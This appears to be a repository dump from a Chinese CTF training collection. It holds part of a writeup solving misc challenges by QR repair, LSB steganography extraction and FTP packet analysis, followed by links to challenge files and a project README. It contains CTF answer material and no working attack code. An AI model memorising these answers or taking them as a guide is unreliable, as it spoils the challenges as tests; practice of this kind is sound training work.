225 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181205233846110.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NXRUVUMFNXQVQ=,size_16,color_FFFFFF,t_70)![在这里插入图片描述](https://img-blog.csdnimg.cn/20181205233856236.png)
226 | 
227 | <kbd>解题经过</kbd>
228 | 
229 | 首先补全残缺的二维码，得到`key: Lsb_1s_gr3at`
230 | 之后到如下地址下载解密还原脚本
231 | >python lsb.py extract 1.png 1.txt Lsb_1s_gr3at
232 | >
233 | 再用`python lsb.py extract 1.png flag.txt Lsb_1s_gr3at`把flag还原出来：
234 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181206005551902.png)
235 | 
236 | ### flag_universe
237 | 
238 | <kbd>题目描述</kbd>  please find the flag in our universe!
239 | 
240 | <kbd>解题经过</kbd>
241 | 
242 | 打开流量包，使用筛选器筛出ftp数据流
243 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181206010743507.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NXRUVUMFNXQVQ=,size_16,color_FFFFFF,t_70)
244 | 然后追踪tcp流量，分析后发现是有上传和下载universe.png的操作，逐一提取出来：
245 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181206010912693.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NXRUVUMFNXQVQ=,size_16,color_FFFFFF,t_70)
246 | 之后发现up01.png图片存在lsb隐写：
247 | 
248 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/2018120601071646.png)
249 | 
250 | 


--------------------------------------------------------------------------------
/2018/百越杯2018/Reverse/Just Reverse It_10feadf0e84b220e4824fce1f176367d.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Reverse/Just Reverse It_10feadf0e84b220e4824fce1f176367d.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Reverse/crazy_8113319c0b88651a1cda1352872e3be1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Reverse/crazy_8113319c0b88651a1cda1352872e3be1.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Reverse/magic_879801ac7e1170fdba5eaf94291611d3.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Reverse/magic_879801ac7e1170fdba5eaf94291611d3.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Web/Download it.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Web/Download it.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Web/Easy flask.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Web/Easy flask.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Web/simple ser.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Web/simple ser.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Web/warmup.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Web/warmup.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/flag_universe/flag_universe.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/flag_universe/flag_universe.pcapng


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/flag_universe/flag_universe_f3b2fac7edc9703224e1fcf53fced535.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/flag_universe/flag_universe_f3b2fac7edc9703224e1fcf53fced535.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/flag_universe/题目信息.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/flag_universe/题目信息.png


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/签到/shudu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/签到/shudu.png


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/签到/题目信息.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/签到/题目信息.png


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/血小板天下第一可爱/xuexiaoban_210565db66adf7671800807cd9593d06.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/血小板天下第一可爱/xuexiaoban_210565db66adf7671800807cd9593d06.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/血小板天下第一可爱/血小板天下第一可爱/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/血小板天下第一可爱/血小板天下第一可爱/1.png


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/血小板天下第一可爱/血小板天下第一可爱/key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/血小板天下第一可爱/血小板天下第一可爱/key.png


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/血小板天下第一可爱/题目信息.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/血小板天下第一可爱/题目信息.png


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/马克/atool.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/马克/atool.png


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/马克/manan_df7f4b63114124324c8a36a4b548e15f.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/马克/manan_df7f4b63114124324c8a36a4b548e15f.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/misc/马克/题目信息.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/misc/马克/题目信息.png


--------------------------------------------------------------------------------
/2018/百越杯2018/pwn/Boring game/bgame_14f6a4f3ce6509b0f8c4bc9c7fdd8dca.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/pwn/Boring game/bgame_14f6a4f3ce6509b0f8c4bc9c7fdd8dca.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/pwn/Boring game/题目信息.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/pwn/Boring game/题目信息.png


--------------------------------------------------------------------------------
/2018/百越杯2018/pwn/format/format_130934106884542e1a64a457e3cc5833.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/pwn/format/format_130934106884542e1a64a457e3cc5833.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/pwn/format/题目信息.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/pwn/format/题目信息.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## CTF-Training
 2 | 
 3 | 本项目将收集各大比赛的 **题目** 和 **Writeup** ，方便大家进行练习。Web类的题目如果能getshell或者文件包含，我们会尽可能弄到源代码，也欢迎大家一起维护这个项目。
 4 | 
 5 | ## 2018赛事
 6 | ## 12月
 7 | 
 8 | - [swpuctf](https://github.com/hongriSec/CTF-Training/tree/master/2018/swpuctf)
 9 | - [百越杯2018](https://github.com/hongriSec/CTF-Training/tree/master/2018/%E7%99%BE%E8%B6%8A%E6%9D%AF2018)
10 | 
11 | ## 11月
12 | 
13 | - [LCTF2018](https://github.com/hongriSec/CTF-Training/tree/master/2018/LCTF2018)
14 | - [湖湘杯2018](https://github.com/hongriSec/CTF-Training/tree/master/2018/%E6%B9%96%E6%B9%98%E6%9D%AF2018)
15 | - [HCTF](https://github.com/hongriSec/CTF-Training/tree/master/2018/hctf)
16 | 
17 | ## 10月
18 | 
19 | - [护网杯](https://github.com/hongriSec/CTF-Training/tree/master/2018/%E6%8A%A4%E7%BD%91%E6%9D%AF)
20 | 
21 | ## 9月
22 | 
23 | - [安恒9月赛](https://github.com/hongriSec/CTF-Training/tree/master/2018/安恒9月赛)
24 | - [XJNUCTF](https://github.com/hongriSec/CTF-Training/tree/master/2018/XJNUCTF)
25 | - [2018网鼎杯线下赛](https://github.com/hongriSec/CTF-Training/tree/master/2018/2018网鼎杯线下赛) 
26 | - [ISC 2018 蓝鲸魔塔线上赛](https://github.com/hongriSec/CTF-Training/tree/master/2018/ISC-2018-蓝鲸魔塔线上赛) 
27 | - [TokyoWesterns CTF 4th 2018](https://github.com/hongriSec/CTF-Training/tree/master/2018/TokyoWesterns-CTF-4th-2018) 
28 | 
29 | ## 8月
30 | 
31 | - [ISG-2018 观安杯安全运维管理赛](https://github.com/hongriSec/CTF-Training/tree/master/2018/ISG-2018%20%E8%A7%82%E5%AE%89%E6%9D%AF%E5%AE%89%E5%85%A8%E8%BF%90%E7%BB%B4%E7%AE%A1%E7%90%86%E8%B5%9B) 
32 | - [网鼎杯第四场](https://github.com/hongriSec/CTF-Training/tree/master/2018/2018%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC4%E5%9C%BA) 
33 | - [网鼎杯第三场](https://github.com/hongriSec/CTF-Training/tree/master/2018/2018%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC3%E5%9C%BA) 
34 | - [网鼎杯第二场](https://github.com/hongriSec/CTF-Training/tree/master/2018/2018%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC2%E5%9C%BA) 
35 | - [网鼎杯第一场](https://github.com/hongriSec/CTF-Training/tree/master/2018/2018%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC1%E5%9C%BA) 
36 | 
37 | ## 7月
38 | 
39 | - [BesideTLV](https://github.com/hongriSec/CTF-Training/tree/master/2018/BesideTLV)
40 | 
41 | ## 项目维护
42 | 
43 | - 小峰（团队[@红日](http://sec-redclub.com/))
44 | - CPR（个人[CSDN](https://blog.csdn.net/hardhard123)）
45 | - 七月火 ([博客](https://mochazz.github.io/))
46 | 
47 | ## 免责说明
48 | 
49 | **请勿用于非法的用途，否则造成的严重后果与本项目无关**
50 | 
51 | ## 转载
52 | 
53 | **转载请注明来自**
54 | 
55 | https://github.com/hongriSec/CTF-Training/
56 | 
57 | ## 投搞
58 | 
59 | **欢迎大家投搞**
60 | 
61 | sec-redclub@qq.com
62 | 


--------------------------------------------------------------------------------